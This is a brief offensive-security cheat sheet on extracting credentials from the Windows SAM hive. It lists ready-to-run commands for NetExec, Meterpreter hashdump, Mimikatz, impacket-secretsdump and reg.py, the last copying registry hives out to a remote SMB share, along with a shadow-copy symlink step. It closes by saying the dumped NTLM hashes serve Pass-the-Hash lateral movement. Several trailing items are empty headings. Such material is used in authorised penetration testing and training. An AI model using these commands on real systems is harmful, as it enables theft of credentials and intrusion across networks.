Extract Credentials from SAM
Tools: CrackMapExec/Netexec , Meterpreter , Mimikatz , impacket-secretsdump , reg.py , vss shadow copies
1) CrackMapExec/Netexec
netexec smb IP_RANGE -u USER -p 'PASSWORD --sam2) Meterpreter
hashdump3) Mimikatz
mimikatz "privilege::debug" "lsadump::sam" "exit"4) Secretsdump
impacket-secretsdump DOMAIN/USER:PASSWORD@IP5) Reg.py
reg.py DOMAIN/USER:PASSWORD@IP backup -o '\\SMB_IP\share'
impacket-secretsdump -security SECURITY_FILE -system SYSTEM_FILE LOCAL6) Shadow Copies (vss)
diskshadow list shadows all
mklink /d c:\shadowcopy \\?\GLOBALROOT\Device\Harddisk VolumeShadowCopy1\7) SAM , SYSTEM and SECURITY hives backup copies
8) HiveDump
9) Mimikatz
With dumping the SAM hive, we dump NTLM hashes to perform Pass-the-Hash attacks (Lateral Movement)
Last updated